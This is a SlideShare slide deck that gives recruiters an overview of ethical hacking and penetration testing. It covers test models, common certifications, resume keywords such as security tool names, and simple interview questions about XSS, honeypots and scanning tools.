SlideShare a Scribd company logo

Recruiters' guide to hire an Ethical hacker

Download as PPT, PDF
Ayman Hussein
Ayman Hussein

a general knowledge you need to know if you wanna make sure this one is a penetration tester or an Ethical hacker to recruit him

Business
1 of 16
Ethical Hacking & Penetration testing General Knowledge Ayman Mohammed – CEH http://www.AymanMohammed.com
Outline • Introduction • Certificates • Keywords • Questions • References
General tips about information security career
Introduction to Ethical Hacking • Ethical hackers ▫ Employed by companies to perform penetration tests • Penetration test ▫ Legal attempt to break into a company’s network to find its weakest link ▫ Tester only reports findings • Security test ▫ More than an attempt to break in; also includes analyzing company’s security policy and procedures ▫ Tester offers solutions to secure or protect the network
The Role of Security and Penetration Testers • Hackers ▫ Access computer system or network without authorization ▫ Breaks the law; can go to prison • Crackers ▫ Break into systems to steal or destroy data ▫ U.S. Department of Justice calls both hackers • Ethical hacker ▫ Performs most of the same activities but with owner’s permission
Penetration-Testing Methodologies • White box model ▫ Tester is told everything about the network topology and technology ▫ Tester is authorized to interview IT personnel and company employees ▫ Makes tester job a little easier • Black box model ▫ Company staff does not know about the test ▫ Tester is not given details about the network  Burden is on the tester to find these details ▫ Tests if security personnel are able to detect an attack • Gray box model ▫ Hybrid of the white and black box models ▫ Company gives tester partial information
Ethical Hacking in a Nutshell • What it takes to be a security tester ▫ Knowledge of network and computer technology ▫ Ability to communicate with management and IT personnel ▫ Understanding of the laws ▫ Ability to use necessary tools
Known certificates in cyber security field
Most famous certificates • EC-Council ▫ CEH(Certified Ethical Hacker) ▫ ECSA (EC-Council Certified Security Analyst) ▫ LPT(Lice sensed Penetration Tester) • SANSGIAC (Global Information Assurance Certification) ▫ GPEN(GIAC Certified Penetration Tester ) ▫ GWAPT(GIAC Web Application Penetration Tester) • OSSTMM (The Open Source Security Testing Methodology Manual) ▫ OPST (OSSTMM PROFESSIONAL SECURITY TESTER ACCREDITED CERTIFICATION) ▫ OPSA (OSSTMM PROFESSIONAL SECURITY ANALYST ACCREDITED CERTIFICATION) ▫ OPSE (OSSTMM PROFESSIONAL SECURITY EXPERT ACCREDITED CERTIFICATION) • Mile2 ▫ CPTEngineer(Certified Pen Testing Engineer)
Keywords you need to know , and search inside the resume
Top Keywords • Certificates : ▫ CEH , ICSSP , LPT , CPTEngineer , ECSA , GPEN, OPST ,OPSA ,OPSE , CISM, CISA • Tools: ▫ Kali , Metasploit , sqlmap , Burp Suite , Acunitix ,IBM Appscan ,Nmap ,Cain & Able ,WireShark ,Nessus ,snort ,OpenSSH ,BackTrack ,Brutus ,John the Ripper. • Methodologies : ▫ OWASP Top 10 , PCI-DSS • Vulnerabilities : ▫ XSS , Sql injection , CSRF , session hijacking , ....
Some questions to assess the Penetration testing knowledge
Questions & answers • Q. What is XSS or Cross Site Scripting? Ans. XSS or cross site scripting is type of vulnerability  that hackers used to attack web applications. • It allows hackers to inject HTML or JAVASCRIPT code  into a web page which can steal the confidential  information from the cookies and returns to the hackers.  It is one of the most critical and common technique  which needs to be prevented. • Q. What is a honeypot? Ans. Honeypot is fake computer system which behaves  like a real system and attracts hackers to attack on it.  Honeypot is used to find out loop holes in the system  and to provide solution for these kinds of attacks.
Questions & answers (cont.) • Q. What type of tools are there out there for packet sniffing? Ans.  Wireshark is probably the most common  packet sniffing tool. This program can help you find  odd traffic across the network or identify a program  that is sending traffic silently from a host.  • Q. Which tools are you using in Performing automatic vulnerability testing? Ans. There are many tools to do so , the most  famous tools are Acunitix , IBM Appscan , Burb  suite , ZAP.
Where to start gain more knowledge
• http://www.softwaretestinghelp.com/interview- questions/security-testing-interview-questions- and-answers/ • http://www.eccouncil.org/Certification/professi onal-series/ceh-course-outline • http://www.zdnet.com/article/10-things-you- need-to-know-before-hiring-penetration- testers/ • https://www.owasp.org/index.php/Top_10_201 3-Table_of_Contents

Recommended

Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
Won Ju Jub
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015
Hykeos
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
OWASP Foundation
 
WiFi Data Leakage by Solomon Sonya
WiFi Data Leakage by Solomon SonyaWiFi Data Leakage by Solomon Sonya
WiFi Data Leakage by Solomon Sonya
EC-Council
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration Testing
ANURAG CHAKRABORTY
 

Recommended

Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
Won Ju Jub
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015
Hykeos
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
OWASP Foundation
 
WiFi Data Leakage by Solomon Sonya
WiFi Data Leakage by Solomon SonyaWiFi Data Leakage by Solomon Sonya
WiFi Data Leakage by Solomon Sonya
EC-Council
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration Testing
ANURAG CHAKRABORTY
 
Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective
Dr. Anish Cheriyan (PhD)
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
S.E. CTS CERT-GOV-MD
 
How to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris SistrunkHow to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris Sistrunk
EC-Council
 
What is Penetration & Penetration test ?
What is Penetration & Penetration test ?What is Penetration & Penetration test ?
What is Penetration & Penetration test ?
Bhavin Shah
 
Extracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet NoiseExtracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet Noise
Ashwini Almad
 
Static Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and YouStatic Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and You
Kevin Fealey
 
DECEPTICONv2
DECEPTICONv2DECEPTICONv2
DECEPTICONv2
👀 Joe Gray
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
EndgameInc
 
Hunting before a Known Incident
Hunting before a Known IncidentHunting before a Known Incident
Hunting before a Known Incident
EndgameInc
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
Md Samsul Kabir
 
How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...
Firojali Laskar
 
What is pentest
What is pentestWhat is pentest
What is pentest
itissolutions
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Roberto Sponchioni
 
Bsides
BsidesBsides
Bsides
Roberto Sponchioni
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
Lionel Faleiro
 
Worst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are DetectedWorst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are Detected
Ashwini Almad
 
Penetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration TestingPenetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration Testing
eNinja Technologies
 
Penetration testing in wireless network
Penetration testing in wireless networkPenetration testing in wireless network
Penetration testing in wireless network
Hadi Fadlallah
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 
Penetration and hacking training brief
Penetration and hacking training briefPenetration and hacking training brief
Penetration and hacking training brief
Bill Nelson
 
Auditing Check Point Firewalls
Auditing Check Point FirewallsAuditing Check Point Firewalls
Auditing Check Point Firewalls
Ben Rothke
 

More Related Content

What's hot

Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective
Dr. Anish Cheriyan (PhD)
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
S.E. CTS CERT-GOV-MD
 
How to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris SistrunkHow to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris Sistrunk
EC-Council
 
What is Penetration & Penetration test ?
What is Penetration & Penetration test ?What is Penetration & Penetration test ?
What is Penetration & Penetration test ?
Bhavin Shah
 
Extracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet NoiseExtracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet Noise
Ashwini Almad
 
Static Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and YouStatic Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and You
Kevin Fealey
 
DECEPTICONv2
DECEPTICONv2DECEPTICONv2
DECEPTICONv2
👀 Joe Gray
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
EndgameInc
 
Hunting before a Known Incident
Hunting before a Known IncidentHunting before a Known Incident
Hunting before a Known Incident
EndgameInc
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
Md Samsul Kabir
 
How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...
Firojali Laskar
 
What is pentest
What is pentestWhat is pentest
What is pentest
itissolutions
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Roberto Sponchioni
 
Bsides
BsidesBsides
Bsides
Roberto Sponchioni
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
Lionel Faleiro
 
Worst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are DetectedWorst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are Detected
Ashwini Almad
 
Penetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration TestingPenetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration Testing
eNinja Technologies
 
Penetration testing in wireless network
Penetration testing in wireless networkPenetration testing in wireless network
Penetration testing in wireless network
Hadi Fadlallah
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 

What's hot (20)

Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective Ethical Hacking Conference 2015- Building Secure Products -a perspective
Ethical Hacking Conference 2015- Building Secure Products -a perspective
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
 
How to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris SistrunkHow to Get into ICS Security byChris Sistrunk
How to Get into ICS Security byChris Sistrunk
 
What is Penetration & Penetration test ?
What is Penetration & Penetration test ?What is Penetration & Penetration test ?
What is Penetration & Penetration test ?
 
Extracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet NoiseExtracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet Noise
 
Static Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and YouStatic Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and You
 
DECEPTICONv2
DECEPTICONv2DECEPTICONv2
DECEPTICONv2
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
 
Hunting before a Known Incident
Hunting before a Known IncidentHunting before a Known Incident
Hunting before a Known Incident
 
Penetration Testing
Penetration TestingPenetration Testing
Penetration Testing
 
How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...How to ethical hacking? The complete ethical hacking certification course beg...
How to ethical hacking? The complete ethical hacking certification course beg...
 
What is pentest
What is pentestWhat is pentest
What is pentest
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
 
Bsides
BsidesBsides
Bsides
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
 
Worst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are DetectedWorst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are Detected
 
Penetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration TestingPenetration Testing Services, Penetration Testing
Penetration Testing Services, Penetration Testing
 
Penetration testing in wireless network
Penetration testing in wireless networkPenetration testing in wireless network
Penetration testing in wireless network
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 

Viewers also liked

Penetration and hacking training brief
Penetration and hacking training briefPenetration and hacking training brief
Penetration and hacking training brief
Bill Nelson
 
Auditing Check Point Firewalls
Auditing Check Point FirewallsAuditing Check Point Firewalls
Auditing Check Point Firewalls
Ben Rothke
 
Ce hv7 module 05 system hacking
Ce hv7 module 05 system hackingCe hv7 module 05 system hacking
Ce hv7 module 05 system hacking
Zuleima Parada
 
Info Security - Vulnerability Assessment
Info Security - Vulnerability AssessmentInfo Security - Vulnerability Assessment
Info Security - Vulnerability Assessment
Marcelo Silva
 
Standard penetration test
Standard penetration testStandard penetration test
Standard penetration test
hari babu
 
Ceh v7 module 01 introduction to ethical hacking
Ceh v7 module 01 introduction to ethical hackingCeh v7 module 01 introduction to ethical hacking
Ceh v7 module 01 introduction to ethical hacking
sabulite
 
The immune checkpoint landscape in 2015: combination therapy
The immune checkpoint landscape in 2015: combination therapyThe immune checkpoint landscape in 2015: combination therapy
The immune checkpoint landscape in 2015: combination therapy
Paul D. Rennert
 
checkpoint
checkpointcheckpoint
checkpoint
Mayank Dhingra
 
Checkpoint Firewall for Dummies
Checkpoint Firewall for Dummies Checkpoint Firewall for Dummies
Checkpoint Firewall for Dummies
sushmil123
 
Temel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıTemel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve Komutları
Ahmet Gürel
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş Dökümanı
Ahmet Gürel
 
Standard Penetration Test
Standard Penetration TestStandard Penetration Test
Standard Penetration Test
Abdur Rahman Quadri
 
TCP-IP Reference Model
TCP-IP Reference ModelTCP-IP Reference Model
TCP-IP Reference Model
Mukesh Tekwani
 
Ip address
Ip addressIp address
Ip address
Amandeep Kaur
 
Ip address and subnetting
Ip address and subnettingIp address and subnetting
Ip address and subnetting
IGZ Software house
 

Viewers also liked (16)

Penetration and hacking training brief
Penetration and hacking training briefPenetration and hacking training brief
Penetration and hacking training brief
 
Auditing Check Point Firewalls
Auditing Check Point FirewallsAuditing Check Point Firewalls
Auditing Check Point Firewalls
 
Ce hv7 module 05 system hacking
Ce hv7 module 05 system hackingCe hv7 module 05 system hacking
Ce hv7 module 05 system hacking
 
Info Security - Vulnerability Assessment
Info Security - Vulnerability AssessmentInfo Security - Vulnerability Assessment
Info Security - Vulnerability Assessment
 
Standard penetration test
Standard penetration testStandard penetration test
Standard penetration test
 
Network Dersleri1
Network Dersleri1Network Dersleri1
Network Dersleri1
 
Ceh v7 module 01 introduction to ethical hacking
Ceh v7 module 01 introduction to ethical hackingCeh v7 module 01 introduction to ethical hacking
Ceh v7 module 01 introduction to ethical hacking
 
The immune checkpoint landscape in 2015: combination therapy
The immune checkpoint landscape in 2015: combination therapyThe immune checkpoint landscape in 2015: combination therapy
The immune checkpoint landscape in 2015: combination therapy
 
checkpoint
checkpointcheckpoint
checkpoint
 
Checkpoint Firewall for Dummies
Checkpoint Firewall for Dummies Checkpoint Firewall for Dummies
Checkpoint Firewall for Dummies
 
Temel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıTemel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve Komutları
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş Dökümanı
 
Standard Penetration Test
Standard Penetration TestStandard Penetration Test
Standard Penetration Test
 
TCP-IP Reference Model
TCP-IP Reference ModelTCP-IP Reference Model
TCP-IP Reference Model
 
Ip address
Ip addressIp address
Ip address
 
Ip address and subnetting
Ip address and subnettingIp address and subnetting
Ip address and subnetting
 

Similar to Recruiters' guide to hire an Ethical hacker

Introduction to CEHv12..pptx
Introduction to CEHv12..pptxIntroduction to CEHv12..pptx
Introduction to CEHv12..pptx
IPSpecialist
 
Ethical Hacking - An Overview
Ethical Hacking - An OverviewEthical Hacking - An Overview
Ethical Hacking - An Overview
Afaq Mansoor Khan
 
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentationIntroduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
Obika Gellineau
 
Ethical Hacker
Ethical HackerEthical Hacker
Ethical Hacker
keriann70
 
Segmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the UglySegmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the Ugly
AlgoSec
 
Ethical Hacking and Defense Penetration
Ethical Hacking and Defense PenetrationEthical Hacking and Defense Penetration
Ethical Hacking and Defense Penetration
Jay Nagar
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Multisoft Virtual Academy
 
Career In Information security
Career In Information securityCareer In Information security
Career In Information security
Anant Shrivastava
 
An Introduction to Ethical Hacking
An Introduction to Ethical HackingAn Introduction to Ethical Hacking
An Introduction to Ethical Hacking
Vinny Vessel
 
Certied Ethical Hacker
Certied Ethical HackerCertied Ethical Hacker
Certied Ethical Hacker
Knowledgehut
 
What is penetration testing and career path
What is penetration testing and career pathWhat is penetration testing and career path
What is penetration testing and career path
Vikram Khanna
 
Security testing
Security testingSecurity testing
Security testing
Rihab Chebbah
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
Hacking and Penetration Testing - a beginners guide
Hacking and Penetration Testing - a beginners guideHacking and Penetration Testing - a beginners guide
Hacking and Penetration Testing - a beginners guide
Pankaj Dubey
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
Chris Gates
 
Ethical Hacking.pptx
Ethical Hacking.pptxEthical Hacking.pptx
Ethical Hacking.pptx
Manojverma564461
 
Security and Penetration Testing Overview
Security and Penetration Testing OverviewSecurity and Penetration Testing Overview
Security and Penetration Testing Overview
QA InfoTech
 
Certified Ethical Hacking - Book Summary
Certified Ethical Hacking - Book SummaryCertified Ethical Hacking - Book Summary
Certified Ethical Hacking - Book Summary
udemy course
 
edCeh brochure
edCeh brochureedCeh brochure
edCeh brochure
Knowledgehut
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile World
David Lindner
 

Similar to Recruiters' guide to hire an Ethical hacker (20)

Introduction to CEHv12..pptx
Introduction to CEHv12..pptxIntroduction to CEHv12..pptx
Introduction to CEHv12..pptx
 
Ethical Hacking - An Overview
Ethical Hacking - An OverviewEthical Hacking - An Overview
Ethical Hacking - An Overview
 
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentationIntroduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
Introduction to Penetration testing - GDG DevFest Caribbean 2021 presentation
 
Ethical Hacker
Ethical HackerEthical Hacker
Ethical Hacker
 
Segmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the UglySegmenting your Network for Security - The Good, the Bad and the Ugly
Segmenting your Network for Security - The Good, the Bad and the Ugly
 
Ethical Hacking and Defense Penetration
Ethical Hacking and Defense PenetrationEthical Hacking and Defense Penetration
Ethical Hacking and Defense Penetration
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Career In Information security
Career In Information securityCareer In Information security
Career In Information security
 
An Introduction to Ethical Hacking
An Introduction to Ethical HackingAn Introduction to Ethical Hacking
An Introduction to Ethical Hacking
 
Certied Ethical Hacker
Certied Ethical HackerCertied Ethical Hacker
Certied Ethical Hacker
 
What is penetration testing and career path
What is penetration testing and career pathWhat is penetration testing and career path
What is penetration testing and career path
 
Security testing
Security testingSecurity testing
Security testing
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Hacking and Penetration Testing - a beginners guide
Hacking and Penetration Testing - a beginners guideHacking and Penetration Testing - a beginners guide
Hacking and Penetration Testing - a beginners guide
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Ethical Hacking.pptx
Ethical Hacking.pptxEthical Hacking.pptx
Ethical Hacking.pptx
 
Security and Penetration Testing Overview
Security and Penetration Testing OverviewSecurity and Penetration Testing Overview
Security and Penetration Testing Overview
 
Certified Ethical Hacking - Book Summary
Certified Ethical Hacking - Book SummaryCertified Ethical Hacking - Book Summary
Certified Ethical Hacking - Book Summary
 
edCeh brochure
edCeh brochureedCeh brochure
edCeh brochure
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile World
 

Recently uploaded

2022 Vintage Roman Numerals Men Rings
2022 Vintage Roman Numerals Men Rings2022 Vintage Roman Numerals Men Rings
2022 Vintage Roman Numerals Men Rings
aragme
 
amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05
marketing317746
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Holger Mueller
 
Best Forex Brokers Comparison in INDIA 2024
Best Forex Brokers Comparison in INDIA 2024Best Forex Brokers Comparison in INDIA 2024
Best Forex Brokers Comparison in INDIA 2024
Top Forex Brokers Review
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
Aggregage
 
Part 2 Deep Dive: Navigating the 2024 Slowdown
Part 2 Deep Dive: Navigating the 2024 SlowdownPart 2 Deep Dive: Navigating the 2024 Slowdown
Part 2 Deep Dive: Navigating the 2024 Slowdown
jeffkluth1
 
Easily Verify Compliance and Security with Binance KYC
Easily Verify Compliance and Security with Binance KYCEasily Verify Compliance and Security with Binance KYC
Easily Verify Compliance and Security with Binance KYC
Any kyc Account
 
Structural Design Process: Step-by-Step Guide for Buildings
Structural Design Process: Step-by-Step Guide for BuildingsStructural Design Process: Step-by-Step Guide for Buildings
Structural Design Process: Step-by-Step Guide for Buildings
Chandresh Chudasama
 
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
AnnySerafinaLove
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
techboxsqauremedia
 
Digital Marketing with a Focus on Sustainability
Digital Marketing with a Focus on SustainabilityDigital Marketing with a Focus on Sustainability
Digital Marketing with a Focus on Sustainability
sssourabhsharma
 
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
Stephen Cashman
 
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
❼❷⓿❺❻❷❽❷❼❽ Dpboss Kalyan Satta Matka Guessing Matka Result Main Bazar chart
 
Income Tax exemption for Start up : Section 80 IAC
Income Tax exemption for Start up : Section 80 IACIncome Tax exemption for Start up : Section 80 IAC
Income Tax exemption for Start up : Section 80 IAC
CA Dr. Prithvi Ranjan Parhi
 
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
Aleksey Savkin
 
BeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdfBeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdf
DerekIwanaka1
 
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
Neil Horowitz
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
SOFTTECHHUB
 
Best practices for project execution and delivery
Best practices for project execution and deliveryBest practices for project execution and delivery
Best practices for project execution and delivery
CLIVE MINCHIN
 
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
taqyea
 

Recently uploaded (20)

2022 Vintage Roman Numerals Men Rings
2022 Vintage Roman Numerals Men Rings2022 Vintage Roman Numerals Men Rings
2022 Vintage Roman Numerals Men Rings
 
amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
 
Best Forex Brokers Comparison in INDIA 2024
